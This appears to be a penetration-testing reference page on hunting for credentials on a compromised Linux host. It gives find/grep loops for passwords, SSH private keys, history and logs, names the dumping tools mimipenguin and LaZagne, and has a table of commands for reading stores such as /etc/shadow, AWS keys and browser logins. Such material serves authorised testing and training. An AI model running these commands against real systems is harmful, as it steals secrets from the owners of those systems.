Credential Hunting in Linux

Hunting for credentials is one of the first steps once we have access to a system. These low-hanging fruits can give us elevated privileges within seconds or minutes.

Credential Storage Categories

Files

History

Memory

Key-Rings

Configs

Logs

Cache

Browser stored credentials

Databases

Command-line History

In-memory Processing

Notes

Scripts

Source codes

Cronjobs

SSH Keys

Common Search Patterns

# General password search
find / -type f -exec grep -l "password" {} \;

# Config files search
find / -name "*.config" -o -name "*.conf" -type f -exec grep -l "pass" {} \;

# Hidden files
find / -name ".*" -type f -exec grep -l "secret" {} \;

Files

Configuration Files

# Find all config files
for l in $(echo ".conf .config .cnf"); do
    echo -e "\nFile extension: " $l
    find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core"
done

# Search for credentials in config files
for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\|lib"); do
    echo -e "\nFile: " $i
    grep "user\|password\|pass" $i 2>/dev/null | grep -v "\#"
done

Databases

# Find database files
for l in $(echo ".sql .db .*db .db*"); do
    echo -e "\nDB File extension: " $l
    find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man"
done

Notes and Text Files

# Find text files in home directories
find /home/* -type f -name "*.txt" -o ! -name "*.*"

Scripts

# Find script files
for l in $(echo ".py .pyc .pl .go .jar .c .sh"); do
    echo -e "\nFile extension: " $l
    find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share"
done

Cronjobs

# Examine system crontab
cat /etc/crontab

# Check cron directories
ls -la /etc/cron.*/

SSH Keys

# Find SSH private keys
grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"

# Find SSH public keys
grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1"

History

Bash History

# Check bash history files
tail -n5 /home/*/.bash*

Logs

Important log files to check:

Log File

Description

/var/log/messages

Generic system activity logs

/var/log/syslog

Generic system activity logs

/var/log/auth.log

(Debian) All authentication related logs

/var/log/secure

(RedHat/CentOS) All authentication related logs

/var/log/boot.log

Booting information

/var/log/dmesg

Hardware and drivers related information and logs

/var/log/kern.log

Kernel related warnings, errors and logs

/var/log/faillog

Failed login attempts

/var/log/cron

Information related to cron jobs

/var/log/mail.log

All mail server related logs

/var/log/httpd

All Apache related logs

/var/log/mysqld.log

All MySQL server related logs

Search logs for sensitive information:

for i in $(ls /var/log/* 2>/dev/null); do
    GREP=$(grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null)
    if [[ $GREP ]]; then
        echo -e "\n#### Log file: " $i
        grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null
    fi
done

Memory and Cache

Using Mimipenguin

sudo python3 mimipenguin.py
sudo bash mimipenguin.sh

Using LaZagne

sudo python2.7 laZagne.py all

Browser Credentials

Firefox Stored Credentials

# Find Firefox profiles
ls -l .mozilla/firefox/ | grep default

# Check stored logins
cat .mozilla/firefox/[profile_dir]/logins.json | jq .

Decrypting Firefox Credentials

python3.9 firefox_decrypt.py

Common Credential Storage Locations

Component

Location

Commands/Methods

What to Look For

WiFi

/etc/NetworkManager/system-connections/

cat *.nmconnection

psk= field

wpa_supplicant

/etc/wpa_supplicant/wpa_supplicant.conf

cat wpa_supplicant.conf

psk= entries

Libsecret

~/.local/share/keyrings/

secret-tool search

Stored passwords

KWallet

~/.kde/share/apps/kwallet/

kwallet-query -l

KDE stored credentials

Chromium

~/.config/chromium/Default/

sqlite3 Login\ Data

CLI History

~/.bash_history, ~/.zsh_history

history | grep -i pass

Plaintext passwords

Mozilla

~/.mozilla/firefox/*.default/

strings key4.db

Thunderbird

~/.thunderbird/*.default/

cat key4.db

Email credentials

Git

.git/config, ~/.gitconfig

git config --list

Repository credentials

Env Variables

/etc/environment, ~/.bashrc

env | grep -i pass

API keys, tokens

GRUB

/etc/grub.d/, /boot/grub/

cat grub.cfg

Boot passwords

Fstab

/etc/fstab

cat /etc/fstab

Mount credentials

AWS

~/.aws/credentials

cat credentials

Access keys

Filezilla

~/.filezilla/filezilla.xml

cat filezilla.xml

FTP credentials

GFTP

~/.gftp/bookmarks

cat bookmarks

FTP logins

SSH

~/.ssh/

cat config, id_rsa

Keys, known hosts

Apache

/etc/apache2/

cat .htpasswd

Web credentials

Shadow

/etc/shadow

cat /etc/shadow

Password hashes

Docker

~/.docker/config.json

cat config.json

Registry auth

KeePass

*.kdbx files

keepass2john

Database passwords

Sessions

/var/lib/php/sessions/

cat sess_*

PHP session data

Keyrings

/etc/default/keyrings/

gnome-keyring-daemon

Stored passwords

PreviousAuthentication Mechanisms - Tools NextDNS Protocol

Last updated 11 months ago

hashtagCredential Hunting in Linux

hashtagCredential Storage Categories

hashtagCommon Search Patterns

hashtagFiles

hashtagConfiguration Files

hashtagDatabases

hashtagNotes and Text Files

hashtagScripts

hashtagCronjobs

hashtagSSH Keys

hashtagHistory

hashtagBash History

hashtagLogs

hashtagMemory and Cache

hashtagUsing Mimipenguin

hashtagUsing LaZagne

hashtagBrowser Credentials

hashtagFirefox Stored Credentials

hashtagDecrypting Firefox Credentials

hashtagCommon Credential Storage Locations